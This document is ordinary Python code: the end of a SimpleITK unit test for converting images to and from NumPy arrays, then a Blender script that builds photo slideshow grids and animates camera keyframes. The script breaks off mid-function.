self._helper_check_sitk_to_numpy_type(sitk.sitkInt32, np.int32)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt64, np.int64)
self._helper_check_sitk_to_numpy_type(sitk.sitkFloat32, np.float32)
self._helper_check_sitk_to_numpy_type(sitk.sitkFloat64, np.float64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt8, np.uint8)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt8, np.int8)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt16, np.uint16)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt16, np.int16)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt32, np.uint32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt32, np.int32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorUInt64, np.uint64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorInt64, np.int64)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorFloat32, np.float32)
self._helper_check_sitk_to_numpy_type(sitk.sitkVectorFloat64, np.float64)
def test_to_numpy_and_back(self):
"""Test converting an image to NumPy array view and back"""
img = sitk.GaussianSource( sitk.sitkFloat32, [100,100], sigma=[10]*3, mean=[50,50] )
h = sitk.Hash( img )
img2 = sitk.GetImageFromArray( sitk.GetArrayViewFromImage(img))
self.assertEqual( h, sitk.Hash( img2 ))
def test_vector_image_to_numpy(self):
"""Test converting back and forth between NumPy array view and SimpleITK
images where the SimpleITK image has multiple components and
stored as a VectorImage."""
# Check 2D
img = sitk.PhysicalPointSource(sitk.sitkVectorFloat32, [3,4])
h = sitk.Hash( img )
nda = sitk.GetArrayViewFromImage(img)
self.assertEqual(nda.shape, (4,3,2))
self.assertEqual(nda[0,0].tolist(), [0,0])
self.assertEqual(nda[2,1].tolist(), [1,2])
self.assertEqual(nda[0,:,0].tolist(), [0,1,2])
img2 = sitk.GetImageFromArray(nda, isVector=True)
self.assertEqual(h, sitk.Hash(img2))
# check 3D
img = sitk.PhysicalPointSource(sitk.sitkVectorFloat32, [3,4,5])
h = sitk.Hash(img)
nda = sitk.GetArrayViewFromImage(img)
self.assertEqual(nda.shape, (5,4,3,3))
self.assertEqual(nda[0,0,0].tolist(), [0,0,0])
self.assertEqual(nda[0,0,:,0].tolist(), [0,1,2])
self.assertEqual(nda[0,:,1,1].tolist(), [0,1,2,3])
img2 = sitk.GetImageFromArray(nda)
self.assertEqual(img2.GetSize(), img.GetSize())
self.assertEqual(img2.GetNumberOfComponentsPerPixel(), img.GetNumberOfComponentsPerPixel())
self.assertEqual(h, sitk.Hash(img2))
def test_arrayview_writable(self):
"""Test correct behavior of writablity to the returned array view."""
img = sitk.Image((9, 10), sitk.sitkFloat32, 1)
a = sitk.GetArrayViewFromImage(img)
with self.assertRaises(ValueError):
a.fill(0)
def test_processing_time(self):
"""Check the processing time the conversions from SimpleITK Image
to numpy array (GetArrayViewFromImage) and
numpy memoryview (GetArrayViewFromImage)."""
# Performance test for SimpleITK Image -> NumPy array
img = sitk.GaussianSource(sitk.sitkFloat32, [3000,3000], sigma=[10]*3, mean=[50,50])
print("\nGet NumPy array from 3000x3000 SimpleITK Image")
nparray_time_elapsed = min(timeit.repeat(lambda: sitk.GetArrayFromImage(img), repeat=5, number=1))
print ("Processing time of GetArrayFromImage (Copy operation) :: {0} (us)".format(nparray_time_elapsed*1e6))
npview_time_elapsed = min(timeit.repeat(lambda: sitk.GetArrayViewFromImage(img), repeat=5, number=1))
print ("Processing time of GetArrayViewFromImage (Array view) :: {0} (us)".format(npview_time_elapsed*1e6))
self.assertTrue( nparray_time_elapsed > npview_time_elapsed)
# Performance test for NumPy array -> SimpleITK Image
Big_nparray = np.zeros((3000,3000), dtype=np.int64);
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
#!/usr/bin/env python2.7
#coding:utf-8
#import bpy
import os
import math
import random
from PIL import Image
import time
import codecs
import hjson
from bslideshow.slideshow import Slideshow
from bslideshow.tools import BlenderTools
ADJUST_Y = -0.1
class Director(BlenderTools):
def __init__ (self):
self.slideshow = None
self.frame = 0.0
self.sortPhotos = False
BlenderTools.__init__(self)
def buildSlideshow (self, i, folderImages):
#folderImages = "/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2"
slideshow = Slideshow('background' + str(i))
#slideshow.selectPhotos("/media/jmramoss/ALMACEN/slideshow/grid_frames/")
slideshow.selectPhotos(folderImages)
print("PRE")
print(slideshow.photos)
if False or (i == 0 and self.sortPhotos):
#sorted(slideshow.photos, key=path)
slideshow.photos.sort(key=lambda x: x.path)
print("POST")
print(slideshow.photos)
#quit()
if True and (i != 0 or (i == 0 and not self.sortPhotos)):
slideshow.shufflePhotos()
slideshow.draw()
#slideshow.alignColumn(separator=0.05)
slideshow.alignGrid(separator=0.2)
slideshow.shuffleTranslate(maxX = 0.05, maxY = 0.05)
slideshow.shuffleRotateZ()
return slideshow
def buildScene (self, folderImages):
import bpy
cam = bpy.data.objects['Camera']
print(str(type(cam)))
from pprint import pprint
pprint(cam)
print(str(cam.items()))
cam.data.clip_start = 0.001
#for i in range(1, 10):
# add_image("/media/jmramoss/ALMACEN/slideshow/ramsau-3564068_960_720.jpg", i)
slideshow = self.buildSlideshow(0, folderImages)
slideshow.parentObj.location[0] += 0.0
slideshow.parentObj.location[1] += 0.0
slideshow.parentObj.location[2] += 0.0
self.slideshow = slideshow
posZ = -0.5
#separator = 1.02
separator = -1.5
separator = 1.2
incZ = -1.1 * 5
for i in range(0, 0):
randomX = 0
randomY = 0
if False:
slideshow = self.buildSlideshow(1, folderImages)
slideshow.parentObj.location[0] += (random.uniform(-0.3, 0.3) * 1)
slideshow.parentObj.location[1] += (random.uniform(-0.3, 0.3) * 1)
slideshow.parentObj.location[2] += (2.0 * posZ) + incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(2, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += 0 + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(3, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += 0 + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(4, folderImages)
slideshow.parentObj.location[0] += 0 + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(5, folderImages)
slideshow.parentObj.location[0] += 0 + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(6, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(7, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(8, folderImages)
slideshow.parentObj.location[0] += -self.slideshow.getDimensions()[0] - separator + randomX
slideshow.parentObj.location[1] += self.slideshow.getDimensions()[1] + separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
if i > 0:
randomX = (random.uniform(-0.3, 0.3) * 1)
randomY = (random.uniform(-0.3, 0.3) * 1)
slideshow = self.buildSlideshow(9, folderImages)
slideshow.parentObj.location[0] += self.slideshow.getDimensions()[0] + separator + randomX
slideshow.parentObj.location[1] += -self.slideshow.getDimensions()[1] - separator + randomY
slideshow.parentObj.location[2] += incZ
incZ -= 0.2
'''
for i in range(2):
slideshow = Slideshow('background' + str(i))
#slideshow.selectPhotos("/media/jmramoss/ALMACEN/slideshow/grid_frames/")
slideshow.selectPhotos("/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
slideshow.shufflePhotos()
slideshow.draw()
#slideshow.alignColumn()
slideshow.alignGrid()
slideshow.shuffleTranslate()
slideshow.shuffleRotateZ()
slideshow.parentObj.location[0] += (random.uniform(-0.3, 0.3) * i)
slideshow.parentObj.location[1] += (random.uniform(-0.3, 0.3) * i)
slideshow.parentObj.location[2] += (-0.1 * i)
if i == 0:
self.slideshow = slideshow
'''
'''
#obj_camera = bpy.context.scene.camera
# Set camera translation
#scene.camera.location.x = 0.0
#scene.camera.location.y = 0.0
#scene.camera.location.z = 80.0
#fov = 50.0
#pi = 3.14159265
# Set camera fov in degrees
#scene.camera.data.angle = fov*(pi/180.0)
'''
def camLookAt (self):
import bpy
if(len(bpy.data.cameras) == 1):
obj = bpy.data.objects['Camera'] # bpy.types.Camera
obj.location.x = 10.0
obj.location.y = -5.0
obj.location.z = 5.0
pass
'''
# Set camera rotation in euler angles
#rx = 0.0
#ry = 0.0
#rz = 0.0
#scene.camera.rotation_mode = 'XYZ'
#scene.camera.rotation_euler[0] = rx*(pi/180.0)
#scene.camera.rotation_euler[1] = ry*(pi/180.0)
#scene.camera.rotation_euler[2] = rz*(pi/180.0)
'''
def camRotate (self, rx, ry, rz):
import bpy
if(len(bpy.data.cameras) == 1):
obj = bpy.data.objects['Camera'] # bpy.types.Camera
obj.rotation_mode = 'XYZ'
obj.rotation_euler[0] = rx*(math.pi/180.0)
obj.rotation_euler[1] = ry*(math.pi/180.0)
obj.rotation_euler[2] = rz*(math.pi/180.0)
pass
def showPicture (self, picName):
import bpy
pic = bpy.data.objects[picName]
obj = bpy.data.objects['Camera'] # bpy.types.Camera
obj.rotation_mode = 'XYZ'
obj.location.x = pic.location.x
obj.location.y = pic.location.y
obj.location.z = pic.location.z + 4.0
rx = 0
ry = 0
rz = 0
obj.rotation_euler[0] = rx*(math.pi/180.0)
obj.rotation_euler[1] = ry*(math.pi/180.0)
obj.rotation_euler[2] = rz*(math.pi/180.0)
''' Animation
#if(len(bpy.data.cameras) == 1):
# obj = bpy.data.objects['Camera'] # bpy.types.Camera
# obj.location.x = 0.0
# obj.location.y = -10.0
# obj.location.z = 10.0
# obj.keyframe_insert(data_path="location", frame=10.0)
# obj.location.x = 10.0
# obj.location.y = 0.0
# obj.location.z = 5.0
# obj.keyframe_insert(data_path="location", frame=20.0)
'''
def showSlideshow2 (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
for i in range(numPhotos):
idx = i + 1
picName = 'pic' + str(idx)
self.showPicture(picName)
frame = i * incFrames
cam = bpy.data.objects['Camera'] # bpy.types.Camera
if i == 0:
cam.keyframe_insert(data_path="location", frame=frame+(2*24))
else:
cam.keyframe_insert(data_path="location", frame=frame-(2*24))
cam.keyframe_insert(data_path="location", frame=frame)
def showSlideshow3 (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
for i in range(numPhotos):
idx = i + 1
picName = 'pic' + str(idx)
self.showPicture(picName)
frame = i * incFrames
incZ = random.uniform(-3.0, 3.0)
cam.location.z = startCamLocationZ + incZ
rx = 3.0 if i % 2 == 0 else 0.0
ry = 0.0 if i % 2 == 0 else 6.0
rz = 0.0 if i % 2 == 0 else 15.0
cam.rotation_euler[1] = rx*(math.pi/180.0)
cam.rotation_euler[1] = ry*(math.pi/180.0)
cam.rotation_euler[2] = rz*(math.pi/180.0)
if i == 0:
cam.keyframe_insert(data_path="location", frame=frame+(2*24))
cam.keyframe_insert(data_path="rotation_euler", frame=frame+(2*24))
else:
cam.keyframe_insert(data_path="location", frame=frame-(2*24))
cam.keyframe_insert(data_path="rotation_euler", frame=frame-(2*24))
cam.keyframe_insert(data_path="location", frame=frame)
cam.keyframe_insert(data_path="rotation_euler", frame=frame)
def showSlideshowDuration (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
idx = random.randint(1, numPhotos)
picName = 'pic' + str(idx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
cam.location.z -= random.uniform(1.0, 2.5)
cam.rotation_euler[0] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
def showSlideshow (self, numPhotos, maxFrames):
import bpy
incFrames = math.ceil(maxFrames / numPhotos)
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
idx = random.randint(1, numPhotos)
picName = 'pic' + str(idx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 6.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
cam.location.z -= random.uniform(1.0, 2.5)
cam.rotation_euler[0] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 15.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + incFrames)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + incFrames)
self.frame = self.frame + incFrames + 12.0
def showRowColumnDuration (self, duration=120):
import bpy
numPhotos = len(self.slideshow.photos)#16
cam = bpy.data.objects['Camera'] # bpy.types.Camera
startCamLocationZ = cam.location.z
startIdx = random.randint(1, numPhotos)
picName = 'pic' + str(startIdx)
pic = bpy.data.objects[picName]
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
endIdx = random.randint(1, numPhotos)
picName = 'pic' + str(endIdx)
pic = bpy.data.objects[picName]
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + random.uniform(3.5, 5.0)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration + 12.0
def showAllPhotos (self, duration=120, zoom=True, onlyEnd=False):
import bpy
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
if zoom:
zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
else:
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
if not onlyEnd:
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def getAllPics (self):
result = list()
for p in self.slideshow.photos:
result.append(p.obj)
return result
def showAllPhotosPicZoomIn (self, picName, duration=120):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = int(duration / 4)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
#cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12 - timeFinalPhoto)
cam.location.x += random.uniform(-0.01, 0.01)
cam.location.y += random.uniform(-0.01, 0.01)
#cam.location.z = centerPosition[2] + random.uniform(-0.001, 0.001)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showAllPhotosPicZoomOut (self, picName, duration=120):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = int(duration / 4)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
#cam.location.z = centerPosition[2] + random.uniform(-0.001, 0.001)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame + timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 12)
self.frame = self.frame + duration
def showAllPhotosPic (self, picName, duration=120, zoom=True):
import bpy
pic = bpy.data.objects[picName]
numPhotos = len(self.slideshow.photos)#16
sizeBorder = int(math.sqrt(numPhotos))
cam = bpy.data.objects['Camera'] # bpy.types.Camera
zoomMinZ1 = 6.0
zoomMaxZ1 = 7.0
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
if sizeBorder == 6:
zoomMinZ2 = 16.0
zoomMaxZ2 = 17.0
elif sizeBorder == 5:
#zoomMinZ2 = 14.0
#zoomMaxZ2 = 15.0
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
zoomMinZ1 = 3.0
zoomMaxZ1 = 4.0
elif sizeBorder == 4:
zoomMinZ2 = 12.0
zoomMaxZ2 = 13.0
elif sizeBorder == 3:
zoomMinZ2 = 10.0
zoomMaxZ2 = 11.0
elif sizeBorder == 2:
zoomMinZ2 = 8.0
zoomMaxZ2 = 9.0
if zoom:
zoomMinZStart = zoomMinZ2
zoomMaxZStart = zoomMaxZ2
zoomMinZEnd = zoomMinZ1
zoomMaxZEnd = zoomMaxZ1
else:
zoomMinZStart = zoomMinZ1
zoomMaxZStart = zoomMaxZ1
zoomMinZEnd = zoomMinZ2
zoomMaxZEnd = zoomMaxZ2
centerPosition = self.slideshow.getCenterPosition()
cam.rotation_mode = 'XYZ'
cam.scale[0] = 1.0
cam.scale[1] = 1.0
cam.scale[2] = 1.0
cam.keyframe_insert(data_path="scale", frame=self.frame)
allPics = self.getAllPics()
timeFinalPhoto = 24*3
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if zoom:
self.showObjects(allPics)
else:
self.showObjects([pic])
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
if not zoom:
cam.location.x = centerPosition[0] + random.uniform(-0.001, 0.001)
cam.location.y = centerPosition[1] + random.uniform(-0.001, 0.001)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZStart, zoomMaxZStart)
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + timeFinalPhoto)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + timeFinalPhoto)
cam.location.x = centerPosition[0] + random.uniform(-0.01, 0.01)
cam.location.y = centerPosition[1] + random.uniform(-0.01, 0.01)
cam.location.z = centerPosition[2] + random.uniform(zoomMinZEnd, zoomMaxZEnd)
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
if zoom:
self.showObjects([pic])
else:
self.showObjects(allPics)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 12 - timeFinalPhoto)
